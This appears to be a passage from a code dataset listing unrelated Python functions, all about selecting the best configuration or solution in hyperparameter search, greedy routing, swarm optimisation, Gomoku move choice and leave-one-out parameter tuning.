in self._exp_confs:\n technique = conf.technique\n if technique not in best_confs or conf.mapes[\"validation\"] < best_confs[technique].mapes[\"validation\"]:\n best_confs[technique] = conf\n for technique in best_confs:\n if not best_technique or best_confs[technique].mapes[\"validation\"] < best_confs[best_technique].mapes[\"validation\"]:\n best_technique = technique\n if bool(self._campaign_configuration['General']['details']):\n for run in run_tec_conf_set:\n for tec in run_tec_conf_set[run]:\n for conf in run_tec_conf_set[run][tec]:\n assert \"hp_selection\" in run_tec_conf_set[run][tec][conf]\n assert \"validation\" in run_tec_conf_set[run][tec][conf], \"training MAPE not found for \" + str(run) + str(tec) + str(conf)\n self._logger.info(\"Run %s - Technique %s - Conf %s - Training MAPE %f - Test MAPE %f\", str(run), ec.enum_to_configuration_label[tec], str(conf), run_tec_conf_set[run][tec][conf][\"hp_selection\"], run_tec_conf_set[run][tec][conf][\"validation\"])\n return best_confs, best_technique", "def pick_first_connection(self):\n self.best_connection = []\n stations = list(self.grid.stations.values())\n\n # add a first station to the track \n for station in stations:\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, station.name)\n\n lookahead_1 = station.connections\n\n # calculate quality of all connections and save the best connection\n for la1 in lookahead_1: \n next_station = stations[int(la1)].name\n self.track.add_station(self.grid, next_station)\n lookahead_2 = stations[int(la1)].get_connections()\n \n for la2 in lookahead_2:\n # if adding the connection exceeds the track's max time length \n if self.track.add_station(self.grid, la2[0].name) is False:\n break\n \n quality = self.grid.get_quality()\n self.track.remove_last_station()\n\n # checks if the quality of the track is the best one yet and remembers it\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [station.name, stations[int(la1)].name, la2[0].name]\n self.track.remove_last_station()\n \n # if adding another track does not lead to a better quality, stop algorithm\n if self.best_connection == []:\n return False\n \n # add best connection to the track\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, self.best_connection[0])\n\n self.count += 1\n\n return station", "def best_config(self):\n if self.total_propose == 0:\n idx = random.randint(0, len(self.config_list))\n result = {'config_id': idx,\n 'score': -1 * float('inf'),\n 'configs': self.config_list[idx]}\n return [result]\n else:\n pareto_board = self.sieve_board.copy()\n pareto_board = pareto_board.dropna()\n nondominated = pareto.eps_sort([list(pareto_board.itertuples(False))],\n objectives=self.pareto_cols,\n epsilons=None,\n maximize=self.max_object_ids)\n pareto_list = []\n for tmp_list in nondominated:\n result = {}\n for i, value in enumerate(tmp_list):\n if i == 1:\n result['config_id'] = value\n result['configs'] = self.config_list[int(value)]\n elif i >= 3:\n result[self.sieve_columns[i]] = value\n pareto_list.append(result)\n return pareto_list", "def get_best_model_configs(self):\n self.best_models = {}\n with self.database:\n cur = self.database.cursor()\n for model in self.active_models:\n if self.tuning_depth == 'minimal':\n a = cur.execute(\"SELECT MAX(accuracy),unique_id from model_performance_results\")\n elif self.tuning_depth == 'normal':\n a = cur.execute(\"SELECT MAX(accuracy),unique_id from model_performance_results WHERE model = ?\",\n (model,))\n elif self.tuning_depth == 'maximal':\n a = cur.execute(\"SELECT MAX(accuracy),unique_id from model_performance_results WHERE model = ?\",\n (model,))\n # TODO not implimented, same as normal\n self.best_models[model] = list(a)[0][0]", "def get_optimum_config(\n self, tested_configs, fold_operation=FoldOperations.MEAN\n ):\n\n list_of_config_vals = []\n list_of_non_failed_configs = [\n conf for conf in tested_configs if not conf.config_failed\n ]\n\n if len(list_of_non_failed_configs) == 0:\n raise Warning(\"No Configs found which did not fail.\")\n try:\n\n if len(list_of_non_failed_configs) == 1:\n best_config_outer_fold = list_of_non_failed_configs[0]\n else:\n for config in list_of_non_failed_configs:\n list_of_config_vals.append(\n MDBHelper.get_metric(\n config,\n fold_operation,\n self.best_config_metric,\n train=False,\n )\n )\n\n if self.maximize_metric:\n # max metric\n best_config_metric_nr = np.argmax(list_of_config_vals)\n else:\n # min metric\n best_config_metric_nr = np.argmin(list_of_config_vals)\n\n best_config_outer_fold = list_of_non_failed_configs[\n best_config_metric_nr\n ]\n\n # inform user\n logger.debug(\n \"Optimizer metric: \"\n + self.best_config_metric\n + \"\\n\"\n + \" --> Maximize metric: \"\n + str(self.maximize_metric)\n )\n\n logger.info(\n \"Number of tested configurations: \" + str(len(tested_configs))\n )\n logger.photon_system_log(\n \"---------------------------------------------------------------------------------------------------------------\"\n )\n logger.photon_system_log(\"BEST_CONFIG \")\n logger.photon_system_log(\n \"---------------------------------------------------------------------------------------------------------------\"\n )\n logger.photon_system_log(\n json.dumps(\n best_config_outer_fold.human_readable_config,\n indent=4,\n sort_keys=True,\n )\n )\n\n return best_config_outer_fold\n except BaseException as e:\n logger.error(str(e))", "def run_algorithm(self):\n print(f\"Checking all possible configurations with {self.algorithm}...\")\n\n if self.algorithm == \"test\" or (self.algorithm == \"greedy\" and\n self.iterations == 1000):\n\n # Test each configuration found with greedy (1000 iterations)\n while True:\n try:\n self.index += 1\n self.batteries = self.load_batteries(self.index)\n\n # Break if all configurations are checked\n except FileNotFoundError:\n break\n self.calculate_cable()\n self.link_houses()\n greedy(self, 1000)\n\n # Load best solution if user wanted to run greedy\n if self.algorithm == \"greedy\":\n self.load()\n self.plot_houses()\n\n # Call correct algorithm\n else:\n self.load()\n if self.algorithm == \"stepdown\":\n stepdown(self)\n elif self.algorithm == \"greedy\":\n greedy(self, self.iterations)\n elif self.algorithm == \"hill\":\n hill_climber(self, self.iterations)\n elif self.algorithm == \"dfs\":\n dfs(self)\n elif self.algorithm == \"random\":\n random_algorithm(self, self.iterations)\n elif self.algorithm == \"bnb\":\n bnb(self)\n\n self.load()\n self.plot_houses()", "def save_final_config(self, finalCfg):\n if True:\n cfgDict = self.bestcfg\n else:\n cfgDict = finalCfg.data\n print 'best score was %d, discrepancies follow:' % self.best\n for p in sorted(cfgDict.keys()):\n if cfgDict[p] != self.goals[p]:\n print '(%s, weight %d) ' % (p, self.weight[p]),", "def next_tune_cfg(self):\n # generate tuning space according to user chosen tuning strategy\n\n while True:\n op_cfgs = {}\n op_cfgs['calib_iteration'] = int(np.random.choice(self.calib_iter))\n op_cfgs['op'] = {}\n for op, configs in self.opwise_quant_cfgs.items():\n cfgs_len = len(configs)\n if cfgs_len > 0:\n op_cfgs['op'][op] = configs[np.random.choice(cfgs_len)]\n else:\n op_cfgs['op'][op] = self.opwise_tune_cfgs[op][np.random.choice(\n len(self.opwise_tune_cfgs[op]))]\n\n yield op_cfgs", "def update_global_best(self, offsprings):\n\n # the fitness of the particles are calculated by their crowding distance\n crowding_distance(swarm)\n\n # the length of the leaders archive cannot be longer than the number of the initial population\n self.leaders += swarm\n self.leaders.truncate(self.options['max_population_size'], 'crowding_distance')\n # self.problem.archive += swarm\n\n return", "def update_global_best(self, swarm):\n\n # the fitness of the particles are calculated by their crowding distance\n crowding_distance(swarm)\n\n # the length of the leaders archive cannot be longer than the number of the initial population\n self.leaders += swarm\n self.leaders.truncate(self.options['max_population_size'], 'crowding_distance')\n # self.problem.archive += swarm\n\n return", "def save_final_config(self, configuration):\n optimal_cfg = ''\n for cfg in configuration.data.keys():\n if configuration.data[cfg] == \"on\":\n optimal_cfg += cfg\n optimal_cfg += ' '\n log.info(\n \"Optimal pass sequence seen so far: [{0}]\".format(optimal_cfg))", "def _get_best_configs(\n self,\n configs: list[Configuration],\n bracket: int,\n stage: int,\n from_keys: list[InstanceSeedBudgetKey],\n ) -> list[Configuration]:\n try:\n n_configs = self._n_configs_in_stage[bracket][stage + 1]\n except IndexError:\n return []\n\n rh = self.runhistory\n configs = configs.copy()\n\n for config in configs:\n isb_keys = rh.get_instance_seed_budget_keys(config)\n if not all(isb_key in isb_keys for isb_key in from_keys):\n raise NotEvaluatedError\n\n selected_configs: list[Configuration] = []\n while len(selected_configs) < n_configs:\n # We calculate the pareto front for the given configs\n # We use the same isb keys for all the configs\n all_keys = [from_keys for _ in configs]\n incumbents = calculate_pareto_front(rh, configs, all_keys)\n\n # Idea: We recursively calculate the pareto front in every iteration\n for incumbent in incumbents:\n configs.remove(incumbent)\n selected_configs.append(incumbent)\n\n # If we have more selected configs, we remove the ones with the smallest crowding distance\n if len(selected_configs) > n_configs:\n all_keys = [from_keys for _ in selected_configs]\n selected_configs = sort_by_crowding_distance(rh, selected_configs, all_keys)[:n_configs]\n logger.debug(\"Found more configs than required. Removed configs with smallest crowding distance.\")\n\n return selected_configs", "def get_config(self, **kwargs) -> dict:\n if self._first_is_default and (not self._results):\n # Try default config first\n new_config = self._params_default\n else:\n new_config = self._sample_config()\n num_tries = 1\n while self._pickle_config(new_config) in self._results:\n if num_tries > self.MAX_RETRIES:\n if self._num_configs is not None:\n num_results = len(self._results)\n logger.log(30, f\"Stopping HPO due to exhausted search space: {num_results} of {self._num_configs} possible configs ran.\")\n raise ExhaustedSearchSpaceError\n assert num_tries <= self.MAX_RETRIES, f\"Cannot find new config in LocalRandomSearcher, even after {self.MAX_RETRIES} trials\"\n new_config = self._sample_config()\n num_tries += 1\n self._add_result(new_config, self._reward_while_pending())\n return new_config", "def update_global_best(self, swarm):\n\n # the fitness of the particles are calculated by their crowding distance\n crowding_distance(swarm)\n\n # the length of the leaders archive cannot be longer than the number of the initial population\n self.leaders += swarm\n self.leaders.truncate(self.options['max_population_size'], 'crowding_distance')\n self.archive += swarm\n\n return", "def search_station(st):\n\n res = []\n for key, val in _STATIONS.items():\n score = fuzz.token_set_ratio(st, key)\n res.append(\n {\n 'station': key,\n 'score': score,\n 'station_id': val\n }\n )\n if not res:\n return {}\n else:\n res = sorted(res, key=lambda k: k['score'], reverse=True)\n res = res[0]\n return res", "def _generate_best_stats(self):\n self._best_trip = self._trips_dict[self._primary_mode]\n self._duration = self._best_trip.get_duration()\n self._distance = self._best_trip.get_distance()\n self._price_range = self._best_trip.get_price_range()\n self.set_start_loc_from_dict(self._best_trip.get_start_location())\n self.set_end_loc_from_dict(self._best_trip.get_end_location())\n self._build_legs()\n self._build_directions()", "def best_last_option(self):\n \n # get essential values\n board = self.get_game_space()\n affinity = self.get_affinity()\n \n # pick the right check for the game we are playing\n if isinstance(board, Gomoku):\n \n # get all possible blocks to make a move in\n winning_blocks = board.get_winning_blocks(affinity)\n print('total winning blocks:'+str(len(winning_blocks)))\n best_blocks = []\n best_block = None\n\n # find the largest blocks to place a stone in\n for block in winning_blocks:\n if affinity == BLUE_TILE():\n if len(best_blocks) == 0: best_blocks.append(block)\n elif len(block.blue) > len(best_blocks[0].blue):\n best_blocks = []\n best_blocks.append(block)\n elif len(block.blue) == len(best_blocks[0].blue):\n best_blocks.append(block)\n elif affinity ==RED_TILE():\n if len(best_blocks) == 0: best_blocks.append(block)\n if len(block.red) > len(best_blocks[0].red):\n best_blocks = []\n best_blocks.append(block)\n elif len(block.red) == len(best_blocks[0].red):\n best_blocks.append(block)\n\n # find the best block to place a stone in\n for block in best_blocks:\n if best_block is None: best_block = block \n elif block.tiles[0][0] <= best_block.tiles[0][0]: \n if (block.tiles[0][1] != block.tiles[1][1]):\n if block.direction == 'vertical':\n if block.tiles[WINNING_ROW_SIZE()-1][1] >= best_block.tiles[WINNING_ROW_SIZE()-1][1]:\n if affinity == RED_TILE(): \n if len(block.red) >= len(best_block.red):\n print('considered block:'+str(block.tiles))\n best_block = block \n if affinity == BLUE_TILE(): \n if len(block.blue) >= len(best_block.blue):\n print('considered block:'+str(block.tiles))\n best_block = block\n else:\n if block.tiles[0][1] >= best_block.tiles[0][1]:\n if affinity == RED_TILE(): \n if len(block.red) >= len(best_block.red):\n print('considered block:'+str(block.tiles))\n best_block = block \n if affinity == BLUE_TILE(): \n if len(block.blue) >= len(best_block.blue):\n print('considered block:'+str(block.tiles))\n best_block = block \n else:\n if block.tiles[0][1] >= best_block.tiles[0][1] and block.tiles[1][0] <= best_block.tiles[1][0]:\n if affinity == RED_TILE(): \n if len(block.red) >= len(best_block.red):\n print('considered block:'+str(block.tiles))\n best_block = block \n if affinity == BLUE_TILE(): \n if len(block.blue) >= len(best_block.blue):\n print('considered block:'+str(block.tiles))\n best_block = block \n\n # find the best move to make out of the best block \n # print('best block:'+str(best_block.tiles))\n best_move = (7,-1)\n for tile_i in range(len(best_block.tiles)):\n tile = best_block.tiles[tile_i]\n next_tile = None\n prev_tile = None \n if tile_i+1 in range(len(best_block.tiles)):\n next_tile = best_block.tiles[tile_i+1]\n if tile_i-1 in range(len(best_block.tiles)):\n prev_tile = best_block.tiles[tile_i-1]\n if board.get_tile(tile[0],tile[1]) == BLANK_TILE():\n if prev_tile is not None and next_tile is None:\n if board.get_tile(prev_tile[0],prev_tile[1]) == affinity:\n if tile[0] <= best_move[0]: \n if tile[1] >= tile[1]:\n best_move = tile \n elif next_tile is not None and prev_tile is None:\n if board.get_tile(next_tile[0],next_tile[1]) == affinity:\n if tile[0] <= best_move[0]: \n if tile[1] >= tile[1]:\n best_move = tile \n elif next_tile is not None and prev_tile is not None:\n if board.get_tile(prev_tile[0],prev_tile[1]) == affinity or \\\n board.get_tile(next_tile[0],next_tile[1]) == affinity:\n if tile[0] <= best_move[0]: \n if tile[1] >= tile[1]:\n best_move = tile \n \n return best_move", "def Alternating_Minimization(self):\n Losses = {'Total':[]}\n self._compute_loss_seperately()\n\n Losses['Total'].append(self.total_loss)\n\n for it in range(self.max_its):\n print('iteration {} starts'.format(it+1))\n\n print('Local Updates:')\n for k in range(self.K):\n self._update_L(k)\n self._update_local_X(k)\n self._update_local_W(k)\n\n print('Global Updates:')\n self._update_G()\n self._update_global_X()\n self._update_global_W()\n\n print('Compute Losses')\n self._compute_loss_seperately()\n self._imputation_error()\n self._forecasting_error()\n\n Losses['Total'].append(self.total_loss)\n\n print('iteration {} complete: SSE: {}, Total loss: {}, Imputation NRMSE: {}, Imputation ND: {}, Forecasting NRMSE {}, Forecasting ND {}'.format(it+1, self.SSE, self.total_loss, self.imputation_NRMSE, self.imputation_ND, self.forecasting_NRMSE, self.forecasting_ND))\n print('Best results so far is {}'.format(self.best_results))\n\n if Losses['Total'][-1] > Losses['Total'][-2]:\n print(\"Error: total loss increases and it is impossible\")\n break", "def get_next_config(self):\n\n self.reset_trial()\n self._cur_config = self.get_default()\n return self._cur_config if len(self._results) == 0 else None", "def _choose_best_trip(self):\n times = [(key, self._trips_dict[key].get_duration()) for key in self._trips_dict.keys()\n if self._trips_dict[key] is not None]\n self._primary_mode = min(times, key=lambda tup: tup[1])[0]", "def set_optimal_parameters(self):\n # Getting the best trial based on the test errors\n idx = self.trial_losses.index(min(self.trial_losses))\n self.best_trial = self.trial_list[idx]\n self.objective.parse_trial(self.best_trial)", "def test_get_all_configurations(self):\n\n time_series = ['test-all-conf-1', 'test-all-conf-2', 'test-all-conf-3']\n [timeserie_configuration.get_timeserie_configure(self.get_local_dynamo_cli(),\n ts) for ts in time_series]\n\n all_configurations = timeserie_configuration.get_all_configurations(\n self.get_local_dynamo_cli())\n self.assertEquals(3, len(all_configurations))\n self.assertTrue(all([conf.default for conf in all_configurations]))", "def greedy(self, iterations):\n # turn houses into list\n random_houses = list(self.houses.values())\n\n iterations = int(iterations)\n\n prices = []\n count = 0\n misses = -iterations\n\n # Do untill we have <iterations> succesfull configurations\n while count < iterations:\n self.disconnect()\n # While one or more batteries are over their capacity or not every\n # house is linked to a battery\n while self.check_linked() is False or self.check_full() is True:\n misses += 1\n\n # shuffle order of houses\n random.shuffle(random_houses)\n\n # remove connections, if any\n self.disconnect()\n\n # for every house find closest battery to connect to provided\n # that this house wont over-cap the battery\n for house in random_houses:\n for i in range(len(self.batteries.values())):\n output = house.output\n curr = self.batteries[list(house.diffs)[i]].filled()\n cap = self.batteries[list(house.diffs)[i]].capacity\n if output + curr <= cap:\n batt = self.batteries[list(house.diffs)[i]]\n house.link = batt\n batt.linked_houses.append(house)\n break\n\n # calculate price\n for battery in self.batteries.values():\n if not battery.linked_houses:\n del battery\n price = self.calculate_cost()\n prices.append(price)\n\n count += 1\n\n if min(prices) < self.lowest:\n self.lowest = min(prices)\n with open(f\"weighted_clusters_WIJK{self.input}.dat\",\n \"wb\") as f:\n pickle.dump([self.houses, self.batteries], f)\n\n # self.plot_houses()\n return min(prices)", "def find_best_free_param_configuration_LOO_adj_sen(p):\n\n measures_res = linux_base_path+ \"/measures_res\"+setup+\"/\"\n# measures_res = base_path +\"\\\\measures_res\"+setup+\"\\\\\"\n# nDCG_MAP_res = base_path +\"\\\\nDCG_MAP_res\\\\\"\n claim_dict = read_pickle(\"claim_dict\")\n claim_num_list = [4,7,17,21,36,37,39,40,41,42,45,46,47,50,51,53,54,55,57,58,59,60,61,62,66,69,70,79,80]\n# claim_num_list = [4,47,53,58,7,54]\n best_configuration_for_nDCG_AP_prec_at_k_left_out_res = {} #key is left out claim and and value is the alpha,beta,lambda configuration that led to best measures - avg nDCG and AP across the train claims\n measures_res_of_left_out_in_its_best_conf = {} #key - left out claim num, and value is the measures of it, in the best configuration without it.\n \n k_val = 50\n prec_at_k_train = rcdtype.recordtype('prec_at_k_train', 'at_5 at_10')\n max_prec_at_k = rcdtype.recordtype('max_prec_at_k', 'max_val max_conf')\n try:\n for left_out_claim_indx in range(len(claim_num_list)):\n max_nDCG = 0\n max_MAP = 0\n max_nDCG_conf = []\n max_MAP_conf = []\n max_prec_at_5 = max_prec_at_k(0,\"\")\n max_prec_at_10 = max_prec_at_k(0,\"\")\n \n left_out_claim_num = claim_num_list[left_out_claim_indx]\n temp_claim_num_list = claim_num_list[:]\n temp_claim_num_list.remove(left_out_claim_num)\n for alpha in range(0,7,1): #change just for test!\n for beta in range(0,10,1):\n for lambda_int in range(0,11,1):\n for delta_1 in range(0,10,1):\n for delta_2 in range(0,10,1):\n if not delta_1+delta_2 >9: \n lambda_f = turn_to_float([lambda_int])\n (alpha_f,beta_f,delta_1_f,delta_2_f) = turn_to_float([alpha,beta,delta_1,delta_2])\n measures_all_claims = utils_linux.read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_delta1_\"+str(delta_1_f)+\"_delta2_\"+str(delta_2_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f))\n \n # AP_all_claims_curr_param_values = read_pickle(nDCG_MAP_res+\"AP_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f))\n # nDCG_all_claims_curr_param_values = read_pickle(nDCG_MAP_res+\"NDCG_all_claims_alpha_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f)+\"_at_\"+str(p))\n # prec_at_k_all_claims_params_values = read_pickle(nDCG_MAP_res+\"prec_at_k_all_claims_\"+str(alpha_f)+\"_beta_\"+str(beta_f)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(lambda_f))\n avg_nDCG_on_train = 0\n MAP_on_train = 0\n p_at_k_train_avg = prec_at_k_train(0,0)\n for clm_num_train in temp_claim_num_list:\n avg_nDCG_on_train += measures_all_claims[str(clm_num_train)][0]\n MAP_on_train += measures_all_claims[str(clm_num_train)][1] #in this config' -> get the measures\n p_at_k_train_avg.at_5 += measures_all_claims[str(clm_num_train)][2]\n p_at_k_train_avg.at_10 += measures_all_claims[str(clm_num_train)][3]\n avg_nDCG_on_train = float(float(avg_nDCG_on_train)/float(len(temp_claim_num_list)))\n MAP_on_train = float(float(MAP_on_train)/float(len(temp_claim_num_list)))\n p_at_k_train_avg.at_5 = float(float(p_at_k_train_avg.at_5)/float(len(temp_claim_num_list)))\n p_at_k_train_avg.at_10 = float(float(p_at_k_train_avg.at_10)/float(len(temp_claim_num_list)))\n \n if avg_nDCG_on_train > max_nDCG:\n max_nDCG = avg_nDCG_on_train\n max_nDCG_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n if MAP_on_train > max_MAP:\n max_MAP = MAP_on_train\n max_MAP_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n if p_at_k_train_avg.at_5 > max_prec_at_5.max_val:\n max_prec_at_5.max_val = p_at_k_train_avg.at_5\n max_prec_at_5.max_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n if p_at_k_train_avg.at_10 > max_prec_at_10.max_val:\n max_prec_at_10.max_val = p_at_k_train_avg.at_10\n max_prec_at_10.max_conf = (alpha_f,beta_f,lambda_f,delta_1_f,delta_2_f)\n best_configuration_for_nDCG_AP_prec_at_k_left_out_res[left_out_claim_num] = [(max_nDCG,max_nDCG_conf),(max_MAP,max_MAP_conf),(max_prec_at_5.max_val,max_prec_at_5.max_conf),(max_prec_at_10.max_val,max_prec_at_10.max_conf)]\n #finished leaving out,\n #now calculate the nDCG and MAP of the left out claims with its best configuration results\n avg_nDCG_on_left_out = 0\n MAP_on_left_out = 0\n avg_prec_at_5_on_left_out = 0\n avg_prec_at_10_on_left_out = 0\n for clm_num in claim_num_list:\n (best_alpha_nDCG,best_beta_nDCG,best_lambda_nDCG,best_delta1_nDCG,best_delta2_nDCG) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1]\n (best_alpha_MAP,best_beta_MAP,best_lambda_MAP,best_delta1_MAP,best_delta2_MAP) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1]\n (best_alpha_prec_at_5,best_beta_prec_at_5,best_lambda_prec_at_5,best_delta1_prec_at_5,best_delta2_prec_at_5) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1]\n (best_alpha_prec_at_10,best_beta_prec_at_10,best_lambda_prec_at_10,best_delta1_prec_at_10,best_delta2_prec_at_10) = best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1]\n #read the best config' dict\n best_config_of_nDCG_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_nDCG)+\"_beta_\"+str(best_beta_nDCG)+\"_delta1_\"+str(best_delta1_nDCG)+\"_delta2_\"+str(best_delta2_nDCG)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_nDCG))\n best_config_of_AP_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_MAP)+\"_beta_\"+str(best_beta_MAP)+\"_delta1_\"+str(best_delta1_MAP)+\"_delta2_\"+str(best_delta2_MAP)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_MAP))\n best_config_of_prec_at_5_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_prec_at_5)+\"_beta_\"+str(best_beta_prec_at_5)+\"_delta1_\"+str(best_delta1_prec_at_5)+\"_delta2_\"+str(best_delta2_prec_at_5)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_prec_at_5)) #take only the first item in the tuple\n best_config_prec_of_at_10_dict = read_pickle(measures_res+\"measures_all_claims_alpha_\"+str(best_alpha_prec_at_10)+\"_beta_\"+str(best_beta_prec_at_10)+\"_delta1_\"+str(best_delta1_prec_at_10)+\"_delta2_\"+str(best_delta2_prec_at_10)+\"_top_k_docs_\"+str(k_val)+\"_lambda_\"+str(best_lambda_prec_at_10)) #take only the second item in the tuple\n measures_res_of_left_out_in_its_best_conf[clm_num] = (best_config_of_nDCG_dict[str(clm_num)][0],best_config_of_AP_dict[str(clm_num)][1],best_config_of_prec_at_5_dict[str(clm_num)][2],best_config_prec_of_at_10_dict[str(clm_num)][3])\n avg_nDCG_on_left_out += best_config_of_nDCG_dict[str(clm_num)][0]\n MAP_on_left_out += best_config_of_AP_dict[str(clm_num)][1]\n avg_prec_at_5_on_left_out += best_config_of_prec_at_5_dict[str(clm_num)][2]\n avg_prec_at_10_on_left_out += best_config_prec_of_at_10_dict[str(clm_num)][3]\n \n save_pickle(measures_res+\"measures_res_of_left_out_in_its_best_conf_k_top_docs_\"+str(k_val)+\"_at_\"+str(p), measures_res_of_left_out_in_its_best_conf)\n #report the avg\n avg_nDCG_on_left_out = float(float(avg_nDCG_on_left_out)/float(len(claim_num_list))) \n MAP_on_left_out = float(float(MAP_on_left_out)/float(len(claim_num_list))) \n avg_prec_at_5_on_left_out = float(float(avg_prec_at_5_on_left_out)/float(len(claim_num_list)))\n avg_prec_at_10_on_left_out = float(float(avg_prec_at_10_on_left_out)/float(len(claim_num_list)))\n #write res to file:\n # claim text, the best nDCG conf and result on train, the nDCG it really has, and the same for AP\n with open(measures_res+\"nDCG_AP_prec_at_k_res_of_left_out_in_its_best_conf_k_top_docs_\"+str(k_val)+\"_at_\"+str(p)+\".csv\", 'wb') as csvfile:\n w = csv.writer(csvfile)\n row = \"claim|best_nDCG|alpha,beta,lambda,delta_1,delta_2,delta_3|best_AP|alpha,beta,lambda,delta_1,delta_2,delta_3|best_prec_at_5|alpha,beta,lambda,delta_1,delta_2,delta_3|best_prec_at_10|alpha,beta,lambda,delta_1,delta_2,delta_3\"\n w.writerow([row])\n for (clm_num,(nDCG,AP,prec_at_5,prec_at_10)) in measures_res_of_left_out_in_its_best_conf.items():\n row = claim_dict[str(clm_num)]+\"&\"+'%.3f'%nDCG+\"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][0][1][3])\n row += \"&\"+'%.3f'%AP+\"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][1][1][3])\n row += \"&\"+'%.3f'%prec_at_5+ \"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][2][1][3])\n row += \"&\"+'%.3f'%prec_at_10+ \"&\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][0])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][1])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][2])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][3])+\",\"+str(best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][4])+\",\"+str(0.9-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][4]-best_configuration_for_nDCG_AP_prec_at_k_left_out_res[clm_num][3][1][3])\n w.writerow([row])\n w.writerow([\"avg_nDCG_on_left_out: \"+ '%.4f'%avg_nDCG_on_left_out ])\n w.writerow([\"MAP_on_left_out: \"+ '%.4f'%MAP_on_left_out])\n w.writerow([\"avg_prec_at_5_on_left_out: \"+ '%.4f'%avg_prec_at_5_on_left_out])\n w.writerow([\"avg_prec_at_10_on_left_out: \"+ '%.4f'%avg_prec_at_10_on_left_out])\n except Exception as err: \n sys.stderr.write('problem in LOO') \n print err", "def find_best(self, num_iters: int, hparams_path: str, trials_path: str) -> None:\n for _ in range(num_iters):\n try:\n trials = pickle.load(open(trials_path, \"rb\"))\n self.last_best = trials.best_trial[\"result\"][\"loss\"]\n except FileNotFoundError:\n trials = Trials()\n logger.info(\n f\"Last best from previous iteration was: {self.last_best} on \"\n f\"[{datetime.now().replace(second=0, microsecond=0)}]\"\n )\n best_hparams = space_eval(\n self.search_space,\n fmin(\n self.objective,\n self.search_space,\n algo=tpe.suggest,\n max_evals=len(trials.trials) + 1,\n show_progressbar=False,\n trials=trials,\n ),\n )\n # Dump Trials object always\n with open(trials_path, \"wb\") as trials_file:\n pickle.dump(trials, trials_file)\n\n # Dump hparams only if better result was achieved\n if trials.best_trial[\"result\"][\"loss\"] < self.last_best:\n best_hparams[\"name\"] = self.name\n best_hparams[\"seed\"] = self.seed\n\n with open(hparams_path, \"w\") as yaml_file:\n YAML().dump(best_hparams, yaml_file)", "def greedy_initial(self):\r\n sol = [] # [[0;2;5;0;4;6;0],[],...]\r\n sol_veh_type = [] # corresponding vehicle type for the solution\r\n route_way_time = []\r\n\r\n to_vist = [i+1 for i in range(store_num - 1)] # [1,5,8,...]\r\n itr = 0\r\n\r\n while len(to_vist) > 0 and itr < 500:\r\n itr += 1\r\n\r\n if itr <= small_veh_cnt:\r\n vehicle_type0 = 2\r\n elif itr <= small_veh_cnt + medium_veh_cnt:\r\n 